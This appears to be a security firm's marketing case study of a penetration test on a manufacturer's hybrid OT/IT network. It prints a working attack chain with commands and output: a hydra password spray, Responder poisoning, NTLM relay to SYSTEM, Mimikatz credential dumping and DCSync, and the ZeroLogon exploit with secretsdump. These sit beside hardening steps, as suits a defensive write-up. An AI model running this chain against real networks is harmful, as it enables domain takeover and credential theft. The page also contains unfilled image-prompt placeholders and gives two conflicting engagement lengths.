Skip to content
Featured Case Study

Network Vulnerability Assessment & Pentesting Securing a hybrid OT/IT manufacturing enterprise against external VPN compromise, LLMNR/NBT-NS poisoning, and full Active Directory domain takeover

AI image prompt — Ultra-realistic, eye-level photograph of a bright, minimalist modern network operations center during the day. On a sleek glass desk, a premium widescreen monitor displays an elegant network topology map and asset risk matrix with glowing warm amber (#f59e0b) accent lines. Bright natural daylight pouring from large office windows, modern ergonomic chairs, neatly racked switches faintly visible behind glass, shot on Hasselblad, high-end professional commercial branding

Project Details

Client
NordForge is a mid-sized industrial manufacturing enterprise operating a hybrid infrastructure that bridges legacy Operational Technology (OT) networks driving factory-floor PLCs with a modern, Active Directory-backed corporate IT environment across three production sites
Industry
Industrial Manufacturing / OT
Company Size
600 - 750
Headquarters
Gothenburg, Sweden
Project Duration
1 month (Mar 2026 - Apr 2026)

A comprehensive internal and external network penetration test of a hybrid OT/IT manufacturing enterprise (NordForge Industries) following a merger. The engagement chained a forgotten external VPN endpoint with weak credentials into LLMNR/NBT-NS poisoning, NTLM relay, and an unpatched domain controller (ZeroLogon / Kerberoasting) to prove full Active Directory domain compromise — then delivered network segmentation, SMB signing enforcement, and legacy protocol teardown to prevent ransomware-scale impact.

Engagement Classification · TLP:RED

Project NordRecon / Hybrid OT-IT Assessment

Full-scope internal and external network penetration test of a post-merger manufacturing enterprise. 7 weeks, deep Active Directory analysis, OT/IT boundary review, and a proven domain-compromise attack chain remediated to ransomware-grade resilience.

Critical
4 Vulnerabilities
Domain
Admin Proven
100%
Remediated

The Post-Merger Network Blind Spot

A merger does not combine two networks. It staples them together and calls the seam a “trust relationship.” NordForge inherited an acquired network whose firewall rules nobody had read, whose edge appliances appeared in no inventory, and whose Active Directory trusts had been configured by people who no longer worked there. The single most dangerous asset in the whole engagement was one nobody at NordForge knew existed — a VPN concentrator still answering on the public internet with a credential from the year before.

In an OT-heavy plant the blast radius is not the usual data-breach story. A pivot from the IT domain into the production OT segment can stop physical lines, corrupt PLC logic, and turn a confidentiality problem into a safety-and-availability one — the kind where the incident report has a headcount attached. Over seven weeks we proved a clean, repeatable path from the public internet to Domain Admin, and from there straight at the factory floor. We stopped at the OT boundary by agreement; an attacker would not have.


Technical Audit Snapshot

Live Hosts Enumerated
1,284
Across 3 production sites
Exposed Services
63
External + internal scope
Vulnerabilities Found
14
CVSS v3.1 4.3 – 10.0
Hops to Domain Admin
4
From external foothold

6-Phase Network Assessment Methodology

The engagement ran across six phases, from external reconnaissance through internal lateral movement. The order matters more than the labels: each phase only exists to feed the next, and the whole chain below started with a single forgotten hostname in a certificate transparency log.

01

OSINT & External Footprinting

Mapped internet-facing assets, ASN ranges, and DNS records. Enumerated forgotten subdomains and a legacy VPN concentrator inherited from the acquired entity via passive certificate transparency logs.

02

Scanning & Service Enumeration

Performed full-range TCP/UDP discovery with Nmap, fingerprinting service versions, SMB dialects, and exposed management interfaces across both the external perimeter and internal VLANs.

03

Vulnerability Analysis

Correlated discovered versions against known CVEs, audited firewall rulesets for overly permissive any-any rules, and identified legacy broadcast protocols (LLMNR/NBT-NS) active on the corporate segment.

04

Exploitation & Initial Access

Compromised the forgotten external VPN endpoint via weak, reused credentials to establish an internal foothold without triggering perimeter alerting.

05

Privilege Escalation & Credential Theft

Captured NetNTLMv2 hashes via LLMNR/NBT-NS poisoning (Responder), relayed them to unsigned SMB hosts, and exploited an unpatched domain controller (ZeroLogon) to seize Domain Admin.

06

Lateral Movement & Remediation Verification

Demonstrated reach toward the OT segment boundary, then co-authored segmentation policy, SMB signing enforcement, and legacy protocol teardown — re-testing each control to confirm closure.


Target Network Topology Under Test

On paper NordForge runs a clean three-tier network: an internet-facing DMZ, a corporate VLAN backed by Active Directory, and an isolated OT zone driving production PLCs. Two words in that sentence were doing a lot of unearned work. The corporate VLAN was a flat /16 with no internal segmentation, and the OT zone was “isolated” only in the sense that nobody had checked the firewall rule that said otherwise. The merger then added a second, unmanaged VPN concentrator that bridged straight into the corporate segment — the tier diagram had grown an edge nobody drew.

%%{init: {'theme': 'base', 'themeVariables': { 'fontSize': '12px', 'primaryColor': '#1f1305', 'primaryTextColor': '#fef3e2', 'primaryBorderColor': '#f59e0b', 'lineColor': '#f59e0b', 'secondaryColor': '#0a0600', 'tertiaryColor': '#171107', 'background': 'transparent', 'clusterBkg': '#13100a', 'clusterBorder': '#3a2814', 'edgeLabelBackground': '#1f1305', 'titleColor': '#fcd34d', 'nodeTextColor': '#fef3e2'}}}%% graph TD classDef untrusted fill:#1c0d0d,stroke:#ef4444,stroke-width:2px,color:#fecdd3; classDef edge fill:#1f1305,stroke:#f59e0b,stroke-width:2px,color:#fef3e2; classDef corp fill:#1f1305,stroke:#f59e0b,stroke-width:3px,color:#fef3e2; classDef ot fill:#0c111d,stroke:#3b82f6,stroke-width:2px,color:#dbeaf8; Internet([Public Internet]):::untrusted Internet --> FW{Perimeter Firewall}:::edge FW --> VPN[Legacy VPN
Concentrator]:::edge VPN -.-> DC[Domain Controller
AD DS]:::corp FW -.-> CorpHosts[Corporate
Workstations]:::corp DC --> OTGW[OT DMZ Gateway]:::ot OTGW --> PLC[(PLC Controllers)]:::ot

Vulnerability Classification Matrix

Each finding was scored with CVSS v3.1 and mapped to its attack technique and remediation status. One caveat on the numbers: a CVSS base score deliberately ignores context, so a “6.5 Medium” over-permissive OT rule was, in this environment, the difference between a contained IT breach and a stopped production line. The base score and the business severity are not the same conversation, and the second one is why that Medium got remediated alongside the Criticals.

IDVulnerability / AssetCategoryCVSS v3.1ScopeExploit ComplexityRemediation Status
OC-NET-001ZeroLogon on Unpatched Domain ControllerPrivilege Escalation10.0 (Critical)Internal NetworkTrivial (CVE-2020-1472)REMEDIATED
OC-NET-002Forgotten External VPN — Weak CredentialsInitial Access9.8 (Critical)External PerimeterLow (Credential spray)REMEDIATED
OC-NET-003LLMNR/NBT-NS Poisoning + NTLM RelayCredential Theft / MITM9.1 (Critical)Internal NetworkMedium (Responder + relay)REMEDIATED
OC-NET-004Kerberoastable Service Accounts (Weak SPNs)Credential Access8.1 (High)Internal NetworkMedium (Offline cracking)REMEDIATED
OC-NET-005Over-Permissive OT Segmentation RuleFirewall Misconfiguration6.5 (Medium)IT ↔ OT BoundaryMedium (Cross-zone pivot)REMEDIATED
Advertisement

External Perimeter vs Internal Network Findings

The engagement split cleanly into two attack surfaces, and they failed in different ways. The external perimeter gave up one thing — a foothold — because of one forgotten box. The internal network then gave up everything, because once you are inside a flat domain with legacy protocols enabled, there is no second perimeter to slow you down. Toggle between the two below.

Forgotten VPN Endpoint

An inherited SSL-VPN concentrator (vpn-legacy.nordforge.example) ran firmware two major versions behind and accepted the reused credential svc_backup : Summer2023! — granting a direct tunnel into the flat corporate VLAN.

Exposed Management Plane

The perimeter firewall exposed its HTTPS administration interface to 0.0.0.0/0 on a non-standard port, discoverable via service fingerprinting and vulnerable to credential stuffing.

Legacy Broadcast Protocols

LLMNR and NBT-NS were enabled domain-wide. Using Responder, we poisoned name resolution to harvest NetNTLMv2 hashes from misconfigured workstation lookups within minutes of gaining internal access.

Unsigned SMB & Stale DC

SMB signing was not enforced, enabling NTLM relay to high-value hosts. A domain controller missing the August 2020 patch was directly exploitable via ZeroLogon (CVE-2020-1472).


Critical Finding OC-NET-002 — Forgotten External VPN Foothold

External reconnaissance against the merged ASN turned up a VPN concentrator in no asset inventory. Certificate transparency logs and reverse-DNS tied it back to the acquired company — this is why passive CT log monitoring earns its keep: it finds the assets your inventory forgot before an attacker does. The appliance ran firmware two major versions behind and, critically, authenticated against a local account database instead of the domain. Local auth meant a stale service credential — svc_backup : Summer2023! — that had survived because it was tied to no person and no offboarding process. Nobody owns a service account, so nobody rotates it.

Attack Path Sequence

← Swipe horizontally to view full sequence flow →

%%{init: {'theme': 'base', 'themeVariables': { 'fontSize': '14px', 'primaryColor': '#1f1305', 'primaryTextColor': '#fef3e2', 'primaryBorderColor': '#f59e0b', 'lineColor': '#f59e0b', 'secondaryColor': '#0a0600', 'tertiaryColor': '#171107', 'background': 'transparent', 'clusterBkg': '#13100a', 'clusterBorder': '#3a2814', 'edgeLabelBackground': '#1f1305', 'titleColor': '#fcd34d', 'nodeTextColor': '#fef3e2'}}}%% sequenceDiagram autonumber participant Attacker as Attacker (Internet) participant VPN as Legacy VPN Concentrator participant Corp as Corporate VLAN participant DC as Domain Controller Attacker->>VPN: Credential spray svc_backup Note over Attacker, VPN: Weak reused password accepted VPN-->>Attacker: Tunnel established → 10.20.0.0/16 Attacker->>Corp: Internal foothold (no perimeter alert) Note over Corp: Flat network, no internal segmentation Attacker->>DC: Reachable on 445/389/88 DC-->>Attacker: Enumerable — proceed to internal phase

Reconnaissance Proof-of-Concept

# External service discovery against the merged ASN range
nmap -sS -sV -p- --min-rate 2000 -oA nordforge_ext 203.0.113.0/24

# Excerpt — the forgotten VPN concentrator
Nmap scan report for vpn-legacy.nordforge.example (203.0.113.47)
PORT     STATE SERVICE   VERSION
443/tcp  open  ssl/https Legacy-VPN Portal 9.1.2 (EOL firmware)
500/tcp  open  isakmp    IKE
4500/tcp open  nat-t-ike

# Low-and-slow password spray against the SSL-VPN portal login form
hydra -L users.txt -p 'Summer2023!' -t 2 -W 30 \
  vpn-legacy.nordforge.example https-post-form \
  "/remote/login:username=^USER^&credential=^PASS^:F=Authentication failed"
[443][http-post-form] host: vpn-legacy.nordforge.example  login: svc_backup  password: Summer2023!

The concentrator dropped the tunnel straight onto a flat /16 corporate VLAN with no internal segmentation. That single design choice is what turned one weak password into a domain problem: every domain-joined host, the domain controllers included, sat one hop from an attacker who had been on the public internet ninety seconds earlier. A segmented network would have made this foothold a nuisance. A flat one made it a beachhead.

The Remediation Block (Before vs After)

The inherited edge configuration versus the hardened one is below. The hardening is not subtle — SSO and MFA, a current firmware train, and a tunnel that lands in a constrained jump segment instead of the whole /16. The cost, stated plainly: federated auth and a jump-host hop add friction for every legitimate remote user, and someone has to own the firmware upgrade cadence forever. That is the actual price of not being here again.

vpn-edge-policy.conf
VULNERABLE (INHERITED)
# Legacy SSL-VPN — local auth, no MFA
auth-source     local
mfa             disabled
firmware        9.1.2   # 2 majors behind, EOL

# Tunnel lands directly on flat corporate /16
split-tunnel    disabled
assigned-subnet 10.20.0.0/16
acl             permit ip any any   # no segmentation
SECURED & HARDENED
# Hardened VPN — federated identity + MFA
auth-source     saml-idp           # central SSO
mfa             required           # TOTP / FIDO2
firmware        10.3.1             # current LTS

# Tunnel lands in a constrained jump segment only
split-tunnel    enforced
assigned-subnet 10.99.250.0/24     # VPN landing VLAN
acl             permit tcp 10.99.250.0/24 to jump-host 22,3389
acl             deny   ip 10.99.250.0/24 to 10.20.0.0/16
# Decommissioned legacy concentrator entirely

Critical Finding OC-NET-003 — LLMNR/NBT-NS Poisoning to NTLM Relay

Once inside, capturing credentials took minutes, not skill. Windows falls back to LLMNR and NBT-NS broadcasts whenever DNS resolution fails, and DNS fails constantly — a mistyped share name, a decommissioned server someone’s login script still references, a mapped drive that no longer exists. Every one of those is a host shouting a hostname onto the wire and trusting whoever answers. Responder answers. The captured NetNTLMv2 material followed within the first ten minutes on the segment.

Attack Vector Diagram

%%{init: {'theme': 'base', 'themeVariables': { 'fontSize': '14px', 'primaryColor': '#1f1305', 'primaryTextColor': '#fef3e2', 'primaryBorderColor': '#f59e0b', 'lineColor': '#f59e0b', 'secondaryColor': '#0a0600', 'tertiaryColor': '#171107', 'background': 'transparent', 'clusterBkg': '#13100a', 'clusterBorder': '#3a2814', 'edgeLabelBackground': '#1f1305', 'titleColor': '#fcd34d', 'nodeTextColor': '#fef3e2'}}}%% graph TD classDef vuln fill:#2d1414,stroke:#ef4444,stroke-width:2px,color:#fecdd3; classDef ok fill:#1a1206,stroke:#f59e0b,stroke-width:2px,color:#fef3e2; Victim[Workstation mistypes share] --> Broadcast{DNS fails →
LLMNR/NBT-NS broadcast?} Broadcast -->|Yes: enabled| Responder[Attacker answers as host]:::vuln Responder --> Capture[Capture NetNTLMv2 hash]:::vuln Capture --> Relay{SMB signing enforced?} Relay -->|No| RelayHost[Relay to admin on target → SYSTEM]:::vuln Relay -->|Yes| Blocked[Relay rejected]:::ok Broadcast -->|No: disabled| Safe[Resolution fails safely]:::ok

Exploitation Mechanics

# 1. Poison LLMNR/NBT-NS and capture hashes
responder -I eth0 -wv

[+] Listening for events...
[SMB] NTLMv2-SSP Hash : NORDFORGE\j.eriksson::NORDFORGE:1122...
[SMB] NTLMv2-SSP Hash : NORDFORGE\svc_sql::NORDFORGE:88af...

# 2. With SMB signing OFF on targets, relay instead of crack
ntlmrelayx.py -tf unsigned_hosts.txt -smb2support -c "whoami"
[*] Authenticating against smb://10.20.14.31 as NORDFORGE\j.eriksson SUCCEED
[*] Executed specified command on host: 10.20.14.31
nt authority\system

Because SMB signing was not enforced, there was no need to crack anything. A captured hash could be relayed live to any host that accepted unsigned SMB, and hosts whose users held local-admin rights elsewhere let us relay straight to SYSTEM, dump cached secrets with Mimikatz, and repeat. Each relayed host added credentials to the pile, and the pile is what eventually contained a Domain Admin. This is the quiet lesson of flat AD: no single step is impressive, but nothing stops the chain, so the small steps compound into total compromise.

# Mimikatz — harvesting cached secrets post-relay
mimikatz # sekurlsa::logonpasswords
  Username : svc_sql
  Domain   : NORDFORGE
  NTLM     : 9f3a...c21d
mimikatz # lsadump::dcsync /user:NORDFORGE\krbtgt
  [DC] 'nordforge.local' will be the domain
  Object RID : 502  Credentials NTLM : 5e1f...a09b

Hardened Domain Configuration

# Disable legacy name resolution domain-wide via GPO
# Computer Config > Admin Templates > Network > DNS Client
Set-GPRegistryValue -Name "Harden-NameResolution" `
  -Key "HKLM\Software\Policies\Microsoft\Windows NT\DNSClient" `
  -ValueName "EnableMulticast" -Type DWord -Value 0

# Disable NBT-NS on all interfaces (deployment script)
$nic = Get-WmiObject Win32_NetworkAdapterConfiguration -Filter "IPEnabled=true"
$nic | ForEach-Object { $_.SetTcpipNetbios(2) }  # 2 = disable NetBIOS over TCP/IP

# Enforce SMB signing to defeat NTLM relay entirely
Set-GPRegistryValue -Name "Enforce-SMB-Signing" `
  -Key "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" `
  -ValueName "RequireSecuritySignature" -Type DWord -Value 1

Critical Finding OC-NET-001 — ZeroLogon Domain Takeover

The acquired environment’s primary domain controller had never received the August 2020 rollup, leaving it open to CVE-2020-1472 (ZeroLogon). The flaw is a cryptographic mistake in Netlogon: a broken use of AES-CFB8 means that roughly one attempt in 256 with an all-zero challenge succeeds, letting an unauthenticated attacker on the network set the DC’s own machine-account password to empty and then impersonate the domain controller. A five-year-old, single-command bug on the most sensitive box in the estate — that is what “we never got round to patching that DC” costs.

Domain Compromise Vector

%%{init: {'theme': 'base', 'themeVariables': { 'fontSize': '14px', 'primaryColor': '#1f1305', 'primaryTextColor': '#fef3e2', 'primaryBorderColor': '#f59e0b', 'lineColor': '#f59e0b', 'secondaryColor': '#0a0600', 'tertiaryColor': '#171107', 'background': 'transparent', 'clusterBkg': '#13100a', 'clusterBorder': '#3a2814', 'edgeLabelBackground': '#1f1305', 'titleColor': '#fcd34d', 'nodeTextColor': '#fef3e2'}}}%% sequenceDiagram autonumber participant A as Attacker (Internal) participant DC as Domain Controller participant DS as AD Database A->>DC: Netlogon auth with all-zero challenge Note over A,DC: CVE-2020-1472 — flawed AES-CFB8 IV A->>DC: Set machine account password = empty DC-->>A: Accepted (no signing required) A->>DS: DCSync as DC machine account DS-->>A: Dump NTLM hashes incl. krbtgt + Domain Admins Note over A,DS: Full domain compromise achieved

Exploitation Proof-of-Concept

# Confirm vulnerability (non-destructive check)
python3 zerologon_tester.py DC01 10.20.0.10
Success! DC01 is vulnerable to ZeroLogon (CVE-2020-1472)

# Exploit + immediate DCSync to extract domain secrets
python3 cve-2020-1472-exploit.py DC01 10.20.0.10
secretsdump.py -just-dc -no-pass 'NORDFORGE/DC01$@10.20.0.10'
Administrator:500:aad3b...:c0ffee...:::
krbtgt:502:aad3b...:5e1f...a09b:::

With krbtgt extracted, the domain was ours in full — Golden Tickets on demand, and a clear path to the OT DMZ gateway, which an over-permissive firewall rule (OC-NET-005) let Domain Admin hosts reach directly. We stopped at the OT boundary by prior agreement, having proven reachability to production-critical systems. Proving reach was the point; crossing it in a live plant is how a penetration test becomes an outage.

Critical remediation note: ZeroLogon has a nasty side effect — the exploit sets the machine-account password to empty in AD but not in the DC’s local registry, so an uncareful run leaves the secure channel broken and can knock the DC offline. This is not a bug to fire off casually against production. We restored the original machine-account password immediately afterwards and coordinated patching as the very first remediation action, before touching anything else.


Active Directory Pivot Explorer

Step through the kill chain one hop at a time. Select a stage to light up the pivot path and see the exact tooling, technique, and outcome — from the internet-facing edge to the OT boundary. Read left to right, it is four moves. That is the uncomfortable part: four.

pivot-telemetry.log
$ Stage 01 — VPN External Edge
hydra -L users.txt -p 'Summer2023!' -t 2 \
vpn-legacy.nordforge.example https-post-form \
"/remote/login:username=^USER^&credential=^PASS^:F=failed"

Low-and-slow spray of an inherited, EOL SSL-VPN portal. A reused service credential grants a tunnel straight onto the flat /16 corporate VLAN — no MFA, no perimeter alert.

▸ Pivot Status: SUCCESS · internal foothold established
$ Stage 02 — Workstation · LLMNR/NBT-NS
responder -I eth0 -wv
[SMB] NTLMv2-SSP Hash : NORDFORGE\j.eriksson::NORDFORGE:1122...
ntlmrelayx.py -tf unsigned_hosts.txt -smb2support -c "whoami"

Poison broadcast name resolution to capture NetNTLMv2 material, then relay to hosts with SMB signing disabled — landing a SYSTEM shell without ever cracking a hash.

▸ Pivot Status: SUCCESS · SYSTEM on 10.20.14.31
$ Stage 03 — Domain Controller · ZeroLogon
python3 zerologon_tester.py DC01 10.20.0.10
Success! DC01 is vulnerable (CVE-2020-1472)
secretsdump.py -just-dc -no-pass 'NORDFORGE/DC01$@10.20.0.10'

An unpatched DC lets us zero out its machine-account password, then DCSync the entire directory — including krbtgt. Full domain compromise from a single flaw.

▸ Pivot Status: SUCCESS · Domain Admin obtained
$ Stage 04 — OT Segment Boundary
# Domain Admin host permitted to reach OT DMZ gateway
nmap -Pn -p 502,44818 10.50.0.0/24   # Modbus / EtherNet-IP
# >>> ENGAGEMENT STOP — OT boundary reached per rules of engagement

An over-permissive firewall rule exposed the OT DMZ gateway to Domain Admin hosts. Reachability to production PLC protocols was confirmed, then halted by prior agreement.

▸ Pivot Status: HALTED · OT reachability proven, not exploited

Network Attack Surface Risk Score · Before vs After

A composite risk score across external exposure, internal segmentation depth, credential hygiene, and AD patch posture. The number is a summary, not a measurement — it is useful for showing a board the shape of the change, less so as a precise gauge. What it does capture honestly is the two moments that moved the needle most: patching the DC, and putting real segmentation between the tiers.

Systemic Risk Mitigation Velocity

Composite threat score across 1,284 enumerated hosts and the merged perimeter

Vulnerable StateHardened State
1007550250Wk 1Wk 2Wk 3Wk 4Wk 5Wk 6Wk 796.1 BaselineDC patchedSegmentation live2.3 Hardened

Side-by-Side Attack Simulator Replay

The same NTLM relay attempt run against the legacy flat network and against the post-engagement segmented, signing-enforced build. The difference is not that the hardened side detects the attack faster — it is that the attack has nothing to catch. Disabled broadcast protocols and enforced SMB signing mean Responder hears silence and the relay is refused outright.

NordForge · Legacy Network
COMPROMISED
responder -I eth0 -wv
Poisoning LLMNR broadcasts… ●●●
→ Captured NetNTLMv2: NORDFORGE\j.eriksson
✓ SMB signing OFF — relayed to 10.20.14.31
SYSTEM shell obtained → DCSync → Domain Admin
NordForge · Hardened Network
BLOCKED
responder -I eth0 -wv
Listening for LLMNR/NBT-NS… ●●●
⚠ No broadcasts observed — LLMNR/NBT-NS disabled via GPO.
Relay attempt → REJECTED: SMB signing required.
telemetry: alert.ntlm.relay_blocked · host=10.20.14.31

Quantifiable Business Impact

The engagement turned an opaque, post-merger network into a measured one — and closed a credible path to full domain compromise and OT-disrupting ransomware before anyone hostile walked it. The ROI column below is deliberately not in dollars: the honest value here is a production halt that did not happen, and you cannot invoice for the absence of a disaster. What you can do is point at the specific door that was open and is now shut.

Security MetricPre-Audit StateHardened StateQuantified ROI
External Foothold PathsForgotten VPN, no MFADecommissioned + SSO/MFAEliminated internet-to-LAN entry vector
Internal Network SegmentationFlat /16, IT↔OT reachableVLANs + enforced OT boundaryContained blast radius; isolated production OT
Credential Theft via Legacy ProtocolsLLMNR/NBT-NS + unsigned SMBProtocols off; SMB signing enforcedDefeated poisoning and NTLM relay entirely
Active Directory Patch PostureZeroLogon-vulnerable DCPatched + tiered admin modelClosed single-shot domain takeover
Ransomware ExposureDomain-wide deploy feasibleChoke points + monitoringPrevented potential multi-site production halt

Strategic Takeaways

Securing a merged, hybrid OT/IT estate means treating the network itself — not just the applications on it — as the trust boundary that gets attacked first.

  1. Inventory is a security control, not paperwork. The most dangerous asset was the one nobody knew existed. You cannot defend, patch, or monitor a box that is not on a list, and a merger is precisely when boxes fall off lists. Reconcile every internet-facing endpoint, VPN, and AD trust before you bridge the networks, because the alternative is finding them the way we did.
  2. A flat network converts one foothold into the whole domain. Segmentation, enforced SMB signing, and disabling LLMNR/NBT-NS are what put friction between “initial access” and “Domain Admin.” The cost is real — segmentation projects break things that quietly depended on flatness, and legacy protocol teardown occasionally surfaces an ancient application that only resolved names by broadcast. Budget for that breakage; it is cheaper than the compromise.
  3. Patch posture on identity infrastructure is the whole game. One unpatched DC turned a multi-stage attack into a single command. Rapid DC patching and a tiered admin model are the highest-leverage controls in any AD estate — and doubly so where an IT compromise can reach across a weak boundary and stop a physical production line.
Accelerated Integration

Ready to secure your architecture?

Initiate a full cryptographic security review, IAM baseline audit, and penetration testing engagement for your organisation.

Project Onboard? Secure Cryptographic Invitation Pipeline
Visual Showcase

System Schema & Architecture

Curated diagrams, interface snapshots, and architectural blueprints illustrating our core technical approach and environment mapping.

AI image prompt — An elegant, high-fidelity plant overview dashboard displaying real-time industrial control telemetry, PLC nodes, and network segmentation zones of a manufacturing environment. Accented with rich warm amber colors (#f59e0b) to illustrate OT/IT security status across production sites, premium industrial operations center interface.
AI image prompt — A clean, bright diagram detailing the segmented enterprise network topology, highlighting clearly defined boundaries between the DMZ, corporate VLAN, and the isolated OT zone. Modern schematic illustrating network routing, secure choke points, and firewall rules in high resolution.
AI image prompt — A premium workspace monitor showing two detailed terminal panels with active security scanning code, Python exploit scripts, and advanced system vulnerability analysis configurations in a sleek warm amber theme.
AI image prompt — A highly detailed, professional enterprise network architecture diagram outlining the secure hybrid OT/IT infrastructure, domain controllers, Active Directory boundaries, and multi-layered access controls with elegant amber highlights.
Client Endorsement

Hear it straight from NordForge Industries

"After acquiring a competitor, we inherited a network we barely understood and could not afford to trust. The assessment team executed a full internal and external assessment that exposed exactly how an attacker could pivot from a forgotten VPN endpoint all the way to domain admin — and into our production OT segment. They proved a complete domain compromise in days, then handed us a concrete segmentation and hardening roadmap. We sleep far better knowing the gaps were closed before anyone malicious found them."

Markus Lindqvist

Markus Lindqvist

CISO at NordForge Industries

Sponsored Link

Subscribe to my newsletter

Receive my case study and the latest articles on my WhatsApp Channel.

Warning

Ask CyberROX AI